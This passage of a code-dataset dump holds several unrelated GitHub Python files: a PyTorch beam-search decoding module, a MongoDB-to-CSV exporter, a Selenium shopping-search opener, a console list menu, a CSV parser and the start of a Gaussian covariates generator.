pace_utils.set_task(self)\n output = self(batch)\n total_loss = sum([v for k, v in output.items() if \"loss\" in k])\n\n return total_loss\n\n def training_epoch_end(self, outs):\n pace_utils.epoch_wrapup(self)\n\n def validation_step(self, batch, batch_idx):\n pace_utils.set_task(self)\n output = self(batch)\n ret = dict()\n if self.hparams.config[\"loss_names\"][\"intent\"] > 0:\n ret[\"intent_logits\"] = output[\"intent_logits\"]\n ret[\"intent_labels\"] = output[\"intent_labels\"]\n return ret\n\n def validation_epoch_end(self, outs):\n if self.hparams.config[\"loss_names\"][\"intent\"] > 0:\n objectives.intent_test_wrapup(outs)\n pace_utils.epoch_wrapup(self)\n\n def test_step(self, batch, batch_idx):\n pace_utils.set_task(self)\n output = self(batch)\n ret = dict()\n\n if self.hparams.config[\"loss_names\"][\"intent\"] > 0:\n ret[\"intent_logits\"] = output[\"intent_logits\"]\n ret[\"intent_labels\"] = output[\"intent_labels\"]\n return ret\n\n def test_epoch_end(self, outs):\n model_name = self.hparams.config[\"load_path\"].split(\"/\")[-1][:-5]\n\n if self.hparams.config[\"loss_names\"][\"intent\"] > 0:\n objectives.intent_test_wrapup(outs)\n if self.hparams.config[\"loss_names\"][\"seq2seq\"] > 0:\n objectives.generation_test_wrapup(self)\n pace_utils.epoch_wrapup(self)\n\n def configure_optimizers(self):\n return pace_utils.set_schedule(self)\n\n\n'''\n decode part,\n adapt some code from unilm\n'''\nclass TransformerSSDecode(TransformerSS):\n def __init__(self,config , mask_word_id = 103 , eos_id=102 , search_beam_size=10 , ngram_size=3 , \n min_len=0 , length_penalty=1.0 , forbid_duplicate_ngrams=False, forbid_ignore_set=None):\n self.mask_word_id = mask_word_id\n self.search_beam_size = search_beam_size\n self.eos_id = eos_id #[SEP]\n self.ngram_size = ngram_size\n self.min_len = min_len\n self.length_penalty = length_penalty\n self.forbid_duplicate_ngrams = forbid_duplicate_ngrams\n self.forbid_ignore_set=forbid_ignore_set\n super().__init__(config)\n\n def encode(self, hidden_states , masks , history_states=None , prev_encoded_layers=None , discard_image=True , text_len=0):\n encoded_layers = []\n num_layers = len(self.transformer.blocks)\n for i, blk in enumerate(self.transformer.blocks):\n if discard_image:\n if i < (num_layers-3):\n hidden_states, _attn = blk(hidden_states, mask=masks, expert_flag=0, it_split=text_len , history_states=history_states)\n else:\n hidden_states, _attn = blk(hidden_states, mask=masks, expert_flag=4, it_split=text_len , history_states=history_states)\n else:\n if i < (num_layers-3):\n hidden_states, _attn = blk(hidden_states, mask=masks, expert_flag=3, it_split=text_len , history_states=history_states)\n else:\n hidden_states, _attn = blk(hidden_states, mask=masks, expert_flag=4, it_split=text_len , history_states=history_states)\n encoded_layers.append(hidden_states)\n \n if prev_encoded_layers is not None:\n history_states = prev_encoded_layers[i]\n hidden_states = self.transformer.norm(hidden_states)\n return hidden_states , encoded_layers\n\n def forward(self , batch , image_token_type_idx=1 , imgkey=\"image\" , decode_prompt=None):\n if self.search_beam_size > 1:\n return self.beam_search(batch , image_token_type_idx , imgkey, decode_prompt)\n device = self.device.type\n text_ids = batch[\"text_ids\"].to(device) #if \"text_ids_mlm\" not in batch else batch[\"text_ids_mlm\"].to(device)\n text_masks = batch[\"text_masks\"].to(device)\n position_ids = batch[\"position_ids\"].to(device)\n use_segment_ids = 
self.hparams.config[\"use_segment_ids\"]\n segment_ids = batch[\"text_segment_ids\"].to(device) if use_segment_ids else None\n # text_embeds = self.text_embeddings(text_ids , token_type_ids=segment_ids)\n\n img = batch[imgkey][0].to(device)\n (\n image_embeds,\n image_masks,\n patch_index,\n image_labels,\n ) = self.transformer.visual_embed(\n img,\n max_image_len=self.hparams.config[\"max_image_len\"],\n mask_it=False,\n )\n\n image_embeds = image_embeds + self.token_type_embeddings(\n torch.full_like(image_masks, image_token_type_idx)\n )\n \n image_patch_len = image_embeds.shape[1]\n max_image_cls_len = self.hparams.config['max_image_len'] + 1\n #如果包含attention_mask , 那么使用attention_mask\n if \"attention_masks\" in batch:\n co_masks = batch[\"attention_masks\"][:,max_image_cls_len-image_patch_len:,max_image_cls_len-image_patch_len:]\n else:\n co_masks = torch.cat([image_masks, text_masks], dim=1)\n\n co_masks = self.get_extended_attention_mask(attention_mask=co_masks).to(device)\n \n if decode_prompt != None:\n prompt = torch.tensor(decode_prompt).repeat(text_ids.shape[0], 1).to(device)\n text_ids = torch.cat((text_ids , prompt), dim=1)\n output_ids = []\n batch_size = text_ids.shape[0]\n input_length = text_ids.shape[1]\n\n next_pos = input_length\n max_length = self.hparams.config[\"max_text_len\"]\n if self.hparams.config[\"max_pred_len\"] >0 :\n max_length = min(max_length,input_length + self.hparams.config[\"max_pred_len\"])\n \n curr_ids = text_ids\n cur_ids = text_ids\n mask_ids = text_ids.new(batch_size,1).fill_(self.mask_word_id)\n\n discard_image = self.hparams.config['discard_image']\n prev_embeddings = None\n prev_encoded_layers = None\n while next_pos < max_length:\n curr_length = list(curr_ids.size())[1]\n start_pos = next_pos - curr_length\n x_input_ids = torch.cat((cur_ids , mask_ids) , dim=1)\n text_len = x_input_ids.shape[1]\n curr_text_embeds = self.text_embeddings(input_ids=x_input_ids , position_ids=position_ids[: ,:x_input_ids.shape[1]] , \n token_type_ids=segment_ids[:,:x_input_ids.shape[1]] if use_segment_ids else None) + self.token_type_embeddings(torch.zeros_like(x_input_ids))\n\n if prev_embeddings is None:\n curr_embeds = torch.cat([image_embeds,curr_text_embeds], dim=1)\n curr_attention_mask = co_masks[:, :,\n :image_patch_len+next_pos+1,:image_patch_len+next_pos+1]\n else:\n curr_embeds = curr_text_embeds[:,-2:]\n curr_attention_mask = co_masks[:, :,\n image_patch_len+start_pos:image_patch_len+next_pos+1,:image_patch_len+next_pos+1] \n if discard_image:\n if prev_embeddings is None:\n curr_embeds = curr_embeds[:,image_patch_len:]\n curr_attention_mask = curr_attention_mask[:,:, \n image_patch_len: , image_patch_len:]\n else:\n curr_attention_mask = curr_attention_mask[:,:,\n :,image_patch_len:]\n new_hidden_states , new_encoded_layers = self.encode(curr_embeds , curr_attention_mask , history_states=prev_embeddings , prev_encoded_layers=prev_encoded_layers , discard_image=discard_image , text_len=text_len)\n last_feats = new_hidden_states[:,-1:, :]\n prediction_scores = self.mlm_score(last_feats)\n _ , max_ids = torch.max(prediction_scores ,dim=-1)\n output_ids.append(max_ids)\n\n if prev_embeddings is None:\n prev_embeddings = curr_embeds[:, :-1 ,:]\n else:\n prev_embeddings = torch.cat(\n (prev_embeddings , curr_embeds[:, :-1 ,:]) , dim=1)\n \n if prev_encoded_layers is None:\n prev_encoded_layers = [layer[:, :-1 , :] for layer in new_encoded_layers]\n else:\n prev_encoded_layers = [torch.cat((xx[0] , xx[1][:, :-1 ,:]) , dim=1)\n for xx in 
zip(prev_encoded_layers , new_encoded_layers)]\n curr_ids = max_ids \n cur_ids = torch.cat((cur_ids , max_ids), dim=1)\n next_pos += 1\n\n ret = {\"pred_seq\":torch.cat(output_ids , dim=1)}\n return ret\n\n def beam_search(self, batch , image_token_type_idx=1 , imgkey=\"image\" , decode_prompt=None):\n device = self.device.type\n text_ids = batch[\"text_ids\"].to(device)\n text_masks = batch[\"text_masks\"].to(device)\n position_ids = batch[\"position_ids\"].to(device)\n use_segment_ids = self.hparams.config[\"use_segment_ids\"]\n segment_ids = batch[\"text_segment_ids\"].to(device) if use_segment_ids else None\n\n img = batch[imgkey][0].to(device) \n (\n image_embeds,\n image_masks,\n patch_index,\n image_labels,\n ) = self.transformer.visual_embed(\n img,\n max_image_len=self.hparams.config[\"max_image_len\"],\n mask_it=False,\n )\n image_embeds = image_embeds + self.token_type_embeddings(torch.full_like(image_masks , image_token_type_idx))\n max_image_cls_len = self.hparams.config['max_image_len'] + 1\n image_patch_len = image_embeds.shape[1]\n #如果包含attention_mask , 那么使用attention_mask\n if \"attention_masks\" in batch:\n co_masks = batch[\"attention_masks\"][:,max_image_cls_len-image_patch_len:,max_image_cls_len-image_patch_len:]\n else:\n co_masks = torch.cat([image_masks, text_masks], dim=1)\n\n co_masks = self.get_extended_attention_mask(attention_mask=co_masks).to(device)\n\n if decode_prompt != None:\n prompt = torch.tensor(decode_prompt).repeat(text_ids.shape[0], 1).to(device)\n text_ids = torch.cat((text_ids , prompt), dim=1)\n\n input_shape = list(text_ids.size())\n batch_size = input_shape[0]\n input_length = input_shape[1]\n\n output_ids = []\n prev_embedding = None\n prev_encoded_layers = None\n curr_ids = text_ids\n cur_ids = text_ids\n mask_ids = text_ids.new(batch_size, 1).fill_(self.mask_word_id)\n next_pos = input_length\n K = self.search_beam_size\n total_scores = []\n beam_masks = []\n step_ids = []\n step_back_ptrs = []\n partial_seqs = []\n forbid_word_mask = None\n buf_matrix = None\n is_first = True\n max_length = self.hparams.config[\"max_text_len\"]\n if self.hparams.config[\"max_pred_len\"] >0 :\n max_length = min(max_length,input_length + self.hparams.config[\"max_pred_len\"])\n \n discard_image = self.hparams.config[\"discard_image\"]\n while next_pos < max_length:\n curr_length = list(curr_ids.size())[1]\n\n start_pos = next_pos - curr_length\n x_input_ids = torch.cat((cur_ids, mask_ids), dim=1)\n text_len = x_input_ids.shape[1]\n curr_text_embeds = self.text_embeddings(input_ids=x_input_ids , position_ids=position_ids[: ,:x_input_ids.shape[1]] , \n token_type_ids=segment_ids[:,:x_input_ids.shape[1]] if use_segment_ids else None) + self.token_type_embeddings(torch.zeros_like(x_input_ids))\n\n if prev_embedding is None:\n curr_embeds = torch.cat([image_embeds,curr_text_embeds], dim=1)\n curr_attention_mask = co_masks[:, :,\n :image_patch_len+next_pos+1,:image_patch_len+next_pos+1]\n else:\n curr_embeds = curr_text_embeds[:,-2:]\n curr_attention_mask = co_masks[:, :,\n image_patch_len+start_pos:image_patch_len+next_pos+1,:image_patch_len+next_pos+1]\n if discard_image:\n if prev_embedding is None:\n curr_embeds = curr_embeds[:, image_patch_len:]\n curr_attention_mask = curr_attention_mask[:, :, \n image_patch_len:, image_patch_len:]\n else:\n curr_attention_mask = curr_attention_mask[:, :,\n :,image_patch_len:]\n\n new_hidden_states , new_encoded_layers = self.encode(curr_embeds , curr_attention_mask , history_states=prev_embedding , 
prev_encoded_layers=prev_encoded_layers , discard_image=discard_image , text_len=text_len)\n last_hidden = new_hidden_states[:, -1:, :]\n prediction_scores = self.mlm_score(last_hidden)\n log_scores = nn.functional.log_softmax(\n prediction_scores, dim=-1)\n if forbid_word_mask is not None:\n log_scores += (forbid_word_mask * -10000.0)\n if self.min_len and (next_pos-input_length+1 <= self.min_len):\n log_scores[:, :, self.eos_id].fill_(-10000.0)\n kk_scores, kk_ids = torch.topk(log_scores, k=K)\n if len(total_scores) == 0:\n k_ids = torch.reshape(kk_ids, [batch_size, K])\n back_ptrs = torch.zeros(batch_size, K, dtype=torch.long)\n k_scores = torch.reshape(kk_scores, [batch_size, K])\n else:\n last_eos = torch.reshape(\n beam_masks[-1], [batch_size * K, 1, 1])\n last_seq_scores = torch.reshape(\n total_scores[-1], [batch_size * K, 1, 1])\n kk_scores += last_eos * (-10000.0) + last_seq_scores\n kk_scores = torch.reshape(kk_scores, [batch_size, K * K])\n k_scores, k_ids = torch.topk(kk_scores, k=K)\n back_ptrs = torch.div(k_ids, K).long()\n kk_ids = torch.reshape(kk_ids, [batch_size, K * K])\n k_ids = torch.gather(kk_ids, 1, k_ids)\n step_back_ptrs.append(back_ptrs)\n step_ids.append(k_ids)\n beam_masks.append(torch.eq(k_ids, self.eos_id).float())\n total_scores.append(k_scores)\n\n def first_expand(x):\n input_shape = list(x.size())\n expanded_shape = input_shape[:1] + [1] + input_shape[1:]\n x = torch.reshape(x, expanded_shape)\n repeat_count = [1, K] + [1] * (len(input_shape) - 1)\n x = x.repeat(*repeat_count)\n x = torch.reshape(x, [input_shape[0] * K] + input_shape[1:])\n return x\n\n def select_beam_items(x, ids):\n id_shape = list(ids.size())\n id_rank = len(id_shape)\n assert len(id_shape) == 2\n x_shape = list(x.size())\n x = torch.reshape(x, [batch_size, K] + x_shape[1:])\n x_rank = len(x_shape) + 1\n assert x_rank >= 2\n if id_rank < x_rank:\n ids = torch.reshape(\n ids, id_shape + [1] * (x_rank - id_rank))\n ids = ids.expand(id_shape + x_shape[1:])\n y = torch.gather(x, 1, ids)\n y = torch.reshape(y, x_shape)\n return y\n\n is_first = (prev_embedding is None)\n if prev_embedding is None:\n prev_embedding = first_expand(curr_embeds[:, :-1, :])\n else:\n prev_embedding = torch.cat(\n (prev_embedding, curr_embeds[:, :-1, :]), dim=1)\n prev_embedding = select_beam_items(\n prev_embedding, back_ptrs)\n\n if prev_encoded_layers is None:\n prev_encoded_layers = [first_expand(\n x[:, :-1, :]) for x in new_encoded_layers]\n else:\n prev_encoded_layers = [torch.cat((x[0], x[1][:, :-1, :]), dim=1)\n for x in zip(prev_encoded_layers, new_encoded_layers)]\n prev_encoded_layers = [select_beam_items(\n x, back_ptrs) for x in prev_encoded_layers]\n curr_ids = torch.reshape(k_ids, [batch_size * K, 1])\n if is_first:\n co_masks = first_expand(co_masks)\n mask_ids = first_expand(mask_ids)\n cur_ids = first_expand(cur_ids)\n image_embeds = first_expand(image_embeds)\n position_ids = first_expand(position_ids)\n cur_ids = torch.cat((cur_ids , curr_ids), dim=1)\n if use_segment_ids: segment_ids = first_expand(segment_ids)\n else :\n cur_ids = select_beam_items(cur_ids , back_ptrs)\n cur_ids = torch.cat((cur_ids , curr_ids), dim=1)\n # segment_ids = select_beam_items(segment_ids , back_ptrs)\n\n if self.forbid_duplicate_ngrams:\n wids = step_ids[-1].tolist()\n ptrs = step_back_ptrs[-1].tolist()\n if is_first:\n partial_seqs = []\n for b in range(batch_size):\n for k in range(K):\n partial_seqs.append([wids[b][k]])\n else:\n new_partial_seqs = []\n for b in range(batch_size):\n for k in range(K):\n 
new_partial_seqs.append(\n partial_seqs[ptrs[b][k] + b * K] + [wids[b][k]])\n partial_seqs = new_partial_seqs\n\n def get_dup_ngram_candidates(seq, n):\n cands = set()\n if len(seq) < n:\n return []\n tail = seq[-(n-1):]\n if self.forbid_ignore_set and any(tk in self.forbid_ignore_set for tk in tail):\n return []\n for i in range(len(seq) - (n - 1)):\n mismatch = False\n for j in range(n - 1):\n if tail[j] != seq[i + j]:\n mismatch = True\n break\n if (not mismatch) and not(self.forbid_ignore_set and (seq[i + n - 1] in self.forbid_ignore_set)):\n cands.add(seq[i + n - 1])\n return list(sorted(cands))\n\n if len(partial_seqs[0]) >= self.ngram_size:\n dup_cands = []\n for seq in partial_seqs:\n dup_cands.append(\n get_dup_ngram_candidates(seq, self.ngram_size))\n if max(len(x) for x in dup_cands) > 0:\n if buf_matrix is None:\n vocab_size = list(log_scores.size())[-1]\n buf_matrix = np.zeros(\n (batch_size * K, vocab_size), dtype=float)\n else:\n buf_matrix.fill(0)\n for bk, cands in enumerate(dup_cands):\n for i, wid in enumerate(cands):\n buf_matrix[bk, wid] = 1.0\n forbid_word_mask = torch.tensor(\n buf_matrix, dtype=log_scores.dtype)\n forbid_word_mask = torch.reshape(\n forbid_word_mask, [batch_size * K, 1, vocab_size]).cuda()\n else:\n forbid_word_mask = None\n next_pos += 1\n\n total_scores = [x.tolist() for x in total_scores]\n step_ids = [x.tolist() for x in step_ids]\n step_back_ptrs = [x.tolist() for x in step_back_ptrs]\n traces = {'pred_seq': [], 'scores': [], 'wids': [], 'ptrs': []}\n for b in range(batch_size):\n scores = [x[b] for x in total_scores]\n wids_list = [x[b] for x in step_ids]\n ptrs = [x[b] for x in step_back_ptrs]\n traces['scores'].append(scores)\n traces['wids'].append(wids_list)\n traces['ptrs'].append(ptrs)\n last_frame_id = len(scores) - 1\n for i, wids in enumerate(wids_list):\n if all(wid == self.eos_id for wid in wids):\n last_frame_id = i\n break\n max_score = -math.inf\n frame_id = -1\n pos_in_frame = -1\n for fid in range(last_frame_id + 1):\n for i, wid in enumerate(wids_list[fid]):\n if wid == self.eos_id or fid == last_frame_id:\n s = scores[fid][i]\n if self.length_penalty > 0:\n s /= math.pow((5 + fid + 1) / 6.0,\n self.length_penalty)\n if s > max_score:\n max_score = s\n frame_id = fid\n pos_in_frame = i\n if frame_id == -1:\n traces['pred_seq'].append([0])\n else:\n seq = [wids_list[frame_id][pos_in_frame]]\n for fid in range(frame_id, 0, -1):\n pos_in_frame = ptrs[fid][pos_in_frame]\n seq.append(wids_list[fid - 1][pos_in_frame])\n seq.reverse()\n traces['pred_seq'].append(seq)\n\n def _pad_sequence(sequences, max_len, padding_value=0):\n trailing_dims = sequences[0].size()[1:]\n out_dims = (len(sequences), max_len) + trailing_dims\n out_tensor = sequences[0].data.new(*out_dims).fill_(padding_value)\n for i, tensor in enumerate(sequences):\n length = tensor.size(0)\n out_tensor[i, :length, ...] 
= tensor\n return out_tensor\n\n for k in ('pred_seq', 'scores', 'wids', 'ptrs'):\n ts_list = traces[k]\n if not isinstance(ts_list[0], torch.Tensor):\n dt = torch.float if k == 'scores' else torch.long\n ts_list = [torch.tensor(it, dtype=dt) for it in ts_list]\n traces[k] = _pad_sequence(\n ts_list, max_length, padding_value=0).to(device)\n\n return traces","repo_name":"AlibabaResearch/DAMO-ConvAI","sub_path":"pace/pace/modules/pace_module.py","file_name":"pace_module.py","file_ext":"py","file_size_in_byte":33876,"program_lang":"python","lang":"en","doc_type":"code","stars":781,"dataset":"github-code","pt":"90"} +{"seq_id":"20541407335","text":"import json\nfrom pymongo import MongoClient\nimport os\n# pprint library is used to make the output look more pretty\nfrom pprint import pprint\nimport csv\n# connect to MongoDB, change the << MONGODB URL >> to reflect your own connection string\nclient = MongoClient(os.getenv('MONGO_URI'))\ndb=client.mantiser\n# Issue the serverStatus command and print the results\n#serverStatusResult=db.command(\"serverStatus\")\n#pprint(serverStatusResult)\n\n\ndef cars():\n f = open(\"results.json\", \"a\")\n result=db.result_car.find()\n f.write(\"[\")\n for doc in result:\n f.write(json.dumps(doc)+\",\\n\")\n f.write(\"{}\")\n f.write(\"]\")\n\n\ndef convertJsonToExcel():\n with open('results.json') as json_file:\n jsondata = json.load(json_file)\n \n data_file = open('jsonoutput.csv', 'w', newline='')\n csv_writer = csv.writer(data_file)\n \n count = 0\n for data in jsondata:\n if count == 0:\n header = data.keys()\n csv_writer.writerow(header)\n count += 1\n csv_writer.writerow(data.values())\n \n data_file.close()\n \n\n#cars()\nconvertJsonToExcel()","repo_name":"mantiser-com/upload","sub_path":"code/exporter.py","file_name":"exporter.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"4396573346","text":"# Products searcher~\nfrom selenium import webdriver\nimport pyautogui\n# edge's webdriver need to update with version!!\n\ndef OpenDriver():\n # executable_path varies from person to person!!\n driver = webdriver.Edge(executable_path=\"X:\\\\edge_driver\\\\msedgedriver.exe\")\n driver.maximize_window\n return driver\n\ndef Error(type):\n if (type == \"Input\"):\n print(\"Input Error, but still help tou to find products.\")\n elif (type == \"Shop\"):\n print(\"There is currently no such online shop to search, or your input is wrong~\")\n else:\n print(\"! Error !\")\n\n\n# ----------------------------------------------------------\n# Main program\n# ----------------------------------------------------------\n# Let user input what they want.\nprint(\"----------\")\nwant = input(\"Want to find... :\")\n\nif (want.replace(\" \", \"\") != \"\"):\n\n money_range = input(\"Whether to open the price range(input \\\"y\\\" or \\\"n\\\" ):\")\n checkYsame = money_range == \"y\" or money_range == \"Y\"\n checkNsame = money_range == \"n\" or money_range == \"N\"\n checkYnt = money_range != \"y\" and money_range != \"Y\"\n checkNnt = money_range != \"n\" and money_range != \"N\"\n\n if checkYsame:\n miniprice = input(\"The lowest price you want... :\")\n maxprice = input(\"The highest price you want... :\")\n elif checkNsame:\n # Won't do anything.\n skip = 1 \n else :\n print(\"Input Error - seems \\\"n\\\" to find products.\")\n\n store = input(\"Want to search in... 
{ 1.shopee、2.momo、3.ruten、4.Amazon(no price range)、5.Above of all } --- input serial number:\")\n\n if (store == \"1\") or (store == \"1.\"):\n driver = OpenDriver()\n if checkNsame or checkYnt:\n if (checkYnt and checkNnt):\n Error(\"Input\")\n driver.get(f\"https://shopee.tw/search?keyword={want}\")\n else:\n driver.get(f\"https://shopee.tw/search?keyword={want}&maxPrice={maxprice}&minPrice={miniprice}\")\n print(\"Succeed\")\n\n elif (store == \"2\") or (store == \"2.\"):\n driver = OpenDriver()\n if checkNsame or checkYnt:\n if (checkYnt and checkNnt):\n Error(\"Input\")\n driver.get(f\"https://www.momoshop.com.tw/search/searchShop.jsp?keyword={want}\")\n else:\n driver.get(f\"https://www.momoshop.com.tw/search/searchShop.jsp?keyword={want}&_advPriceS={miniprice}&_advPriceE={maxprice}\")\n print(\"Succeed\")\n\n elif (store == \"3\") or (store == \"3.\"):\n driver = OpenDriver()\n if checkNsame or checkYnt:\n if (checkYnt and checkNnt):\n Error(\"Input\")\n driver.get(f\"https://www.ruten.com.tw/find/?q={want}\")\n else:\n driver.get(f\"https://www.ruten.com.tw/find/?q={want}&prc.now={miniprice}-{maxprice}\")\n print(\"Succeed\")\n\n elif (store == \"4\") or (store == \"4.\"):\n driver = OpenDriver()\n if checkYsame:\n print(\"There is currently no price query function, but it still helps you find products.\")\n elif checkNnt:\n Error(\"Input\")\n driver.get(f\"https://www.amazon.com/s?k={want}\")\n print(\"Succeed\")\n\n elif (store == \"5\") or (store == \"5.\"):\n page = 1\n driver = OpenDriver()\n \n if checkNsame:\n driver.get(f\"https://shopee.tw/search?keyword={want}\")\n\n #[1]:click Ctrl + T to add new page\n pyautogui.hotkey('ctrl', 't', interval=0.1) #[1]\n #[2]:switch webdriver's window handle\n driver.switch_to.window(driver.window_handles[page]) #[2]\n #[3]:remind that: page+1\n page+=1 #[3]\n driver.get(f\"https://www.momoshop.com.tw/search/searchShop.jsp?keyword={want}\")\n\n pyautogui.hotkey('ctrl', 't', interval=0.1)\n driver.switch_to.window(driver.window_handles[page])\n page+=1\n driver.get(f\"https://www.ruten.com.tw/find/?q={want}\")\n \n pyautogui.hotkey('ctrl', 't', interval=0.1)\n driver.switch_to.window(driver.window_handles[page])\n page+=1\n driver.get(f\"https://www.amazon.com/s?k={want}\")\n\n elif checkYsame:\n driver.get(f\"https://shopee.tw/search?keyword={want}&maxPrice={maxprice}&minPrice={miniprice}\")\n \n pyautogui.hotkey('ctrl', 't', interval=0.1)\n driver.switch_to.window(driver.window_handles[page])\n page+=1\n driver.get(f\"https://www.momoshop.com.tw/search/searchShop.jsp?keyword={want}&_advPriceS={miniprice}&_advPriceE={maxprice}\")\n\n pyautogui.hotkey('ctrl', 't', interval=0.1)\n driver.switch_to.window(driver.window_handles[page])\n page+=1\n driver.get(f\"https://www.ruten.com.tw/find/?q={want}&prc.now={miniprice}-{maxprice}\")\n \n pyautogui.hotkey('ctrl', 't', interval=0.1)\n driver.switch_to.window(driver.window_handles[page])\n page+=1\n driver.get(f\"https://www.amazon.com/s?k={want}\")\n print(\"Succeed\")\n else :\n Error(\"Shop\")\n\nelif (want.replace(\" \", \"\") == \"\"):\n Error(\"\")\n\nprint(\"----------\")","repo_name":"opda0887/online_shop_opener-py","sub_path":"online_shop_EN.py","file_name":"online_shop_EN.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"3074960363","text":"menu_item = 0\nlista =[]\nwhile menu_item != 5:\n\tprint (\"-----------------------------------\")\n\tprint (\"1. 
Print the list\")\n\tprint (\"2. Add an item to the list\")\n\tprint (\"3. Remove an item from the list\")\n\tprint (\"4. Change an item in the list\")\n\tprint (\"5. Quit\")\n\tmenu_item = int(input(\"Choose an option: \"))\n\tif menu_item == 1:\n\t\tcurrent = 0\n\t\tif len(lista)> 0:\n\t\t\twhile current < len(lista):\n\t\t\t\tprint (current, \".\", lista[current])\n\t\t\t\tcurrent = current + 1\n\t\telse:\n\t\t\tprint (\"Nothing in the list\")\n\telif menu_item == 2:\n\t\titem_add = input(\"What's the item you want to add?: \")\n\t\tlista.append(item_add)\n\telif menu_item == 3:\n\t\tdelete_a = input(\"What is the name of the item you want to remove?: \")\n\t\tif delete_a in lista:\n\t\t\tlista.remove(delete_a)\n\t\telse:\n\t\t\tprint (\"No such item\")\n\telif menu_item == 4:\n\t\told= input(\"What is the name of item you wish to change?: \")\n\t\tif old in lista:\n\t\t\tnew_number = lista.index(old)\n\t\t\tnew = input(\"What's the new name of the item?: \")\n\t\t\tlista[new_number]= new\n\t\telse:\n\t\t\tprint (\"No such item\")\n\n \n","repo_name":"Kanac/Python","sub_path":"add_remove_list.py","file_name":"add_remove_list.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"74483595822","text":"import csv\n\nfrom .math import *\n\ndef readfile(source):\n \n ndict={}\n \n with open(source,newline='') as file:\n reader = csv.reader(file,delimiter=',')\n for row in reader:\n if ' '==row[-1] or ''==row[-1]:\n x=row\n x.pop()\n ndict[x[-1]]=x[:-1]\n else:\n ndict[row[-1]]=row[:-1]\n \n return ndict\n\ndef readerror(source,mode,xlen=1,ylen=1):\n \n with open(source,newline='') as file:\n reader = list(csv.reader(file,delimiter=','))\n \n if mode=='multi':\n x=reader[1]\n y=reader[0]\n \n if len(x)<4:\n ex=[]\n for i in range(xlen):\n ex.append(reader[1][1])\n else:\n ex=x\n if len(y)<4:\n why=[]\n for j in range(ylen):\n why.append(reader[0][1])\n else:\n why=y\n \n \n return ex[1:-1],why[1:-1]\n else:\n x,y=[],[]\n for i in range(xlen):\n x.append(reader[1][1])\n for j in range(ylen):\n y.append(reader[0][1])\n return x,y \n \n\n# def points():\n# a = int(input('Number of Points: ')) #Establishing the number of data points overall\n# b = int(input('Number of X readings: ')) #Entering the various X values, factoring multiple readings\n# xs,ys,xerrs,yerrs=[],[],[],[]\n \n# constant_x_error=input('Is X Error Constant (Y/N)')\n# constant_y_error=input('Is Y Error Constant (Y/N)')\n \n# if constant_y_error=='Y' or 'y':\n# yerr=float(input('Error on Y:'))\n \n# if constant_x_error=='Y' or 'y':\n# xerr=float(input('Error on X:'))\n \n# for i in range(a):\n# y=float(input('Y: ')) #Entering the various Y values, whilst iterating across the number of data points\n\n# if b>1:\n# xls=[]\n# for i in range(b): \n# xls.append(xerr)\n# x,xerr=stats(xls) #Calculating error\n# elif b==1:\n# x=float(input('X: '))\n\n# print(\"Point is (\"+str(x)+\",\"+str(y)+\")\")\n# xs.append(x)\n# ys.append(y)\n# xerrs.append(xerr)\n# yerrs.append(yerr)\n# else:\n# for i in range(a):\n# y=float(input('Y: ')) #Entering the various Y values, whilst iterating across the number of data points\n\n# if b>1:\n# xls=[]\n# for i in range(b): \n# xls.append(float(input('X: ')))\n# x,xerr=stats(xls) #Calculating error\n# elif b==1:\n# x=float(input('X: '))\n\n# print(\"Point is (\"+str(x)+\",\"+str(y)+\")\")\n# xs.append(x)\n# ys.append(y)\n# xerrs.append(xerr)\n# yerrs.append(yerr)\n# else:\n# if constant_x_error=='Y' or 'y':\n# 
xerr=float(input('Error on Y:'))\n \n# for i in range(a):\n# y=float(input('Y: ')) #Entering the various Y values, whilst iterating across the number of data points\n# yerr=float(input('Error on Y:'))\n \n# if b>1:\n# xls=[]\n# for i in range(b): \n# xls.append(xerr)\n# x,xerr=stats(xls) #Calculating error\n# elif b==1:\n# x=float(input('X: '))\n# xerr=float(input('X Error: '))\n\n# print(\"Point is (\"+str(x)+\",\"+str(y)+\")\")\n# xs.append(x)\n# ys.append(y)\n# xerrs.append(xerr)\n# yerrs.append(yerr)\n# else:\n# for i in range(a):\n# y=float(input('Y: ')) #Entering the various Y values, whilst iterating across the number of data points\n# yerr=float(input('Error on Y:'))\n \n# if b>1:\n# xls=[]\n# for i in range(b): \n# xls.append(float(input('X: ')))\n# x,xerr=stats(xls) #Calculating error\n# elif b==1:\n# x=float(input('X: '))\n# xerr=float(input('X Error: '))\n\n# print(\"Point is (\"+str(x)+\",\"+str(y)+\")\")\n# xs.append(x)\n# ys.append(y)\n# xerrs.append(xerr)\n# yerrs.append(yerr)\n\n# return xs,ys,xerrs,yerrs\n","repo_name":"Chueyyew/autoplot","sub_path":"functions/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"5639167729","text":"import numpy as np\nimport torch\n\nfrom ..config.config import PyTorchConfig\n\nclass GaussianCovariates:\n \"\"\" A class for generating normally distributed covariates. \"\"\"\n\n @staticmethod\n def generate_covariates_matrix(\n n, d, pytorch_config = PyTorchConfig(), covariance_matrix = None):\n \"\"\" Parameters:\n n The number of data points.\n d The number of covariates per data point.\n covariance_matrix A d x d numpy covariance matrix. If none,\n identity matrix is assumed.\n pytorch_config A gen.config.PyTorchConfig object. 
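\n            Returns an (n, d) torch tensor of samples on the configured device.\n        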
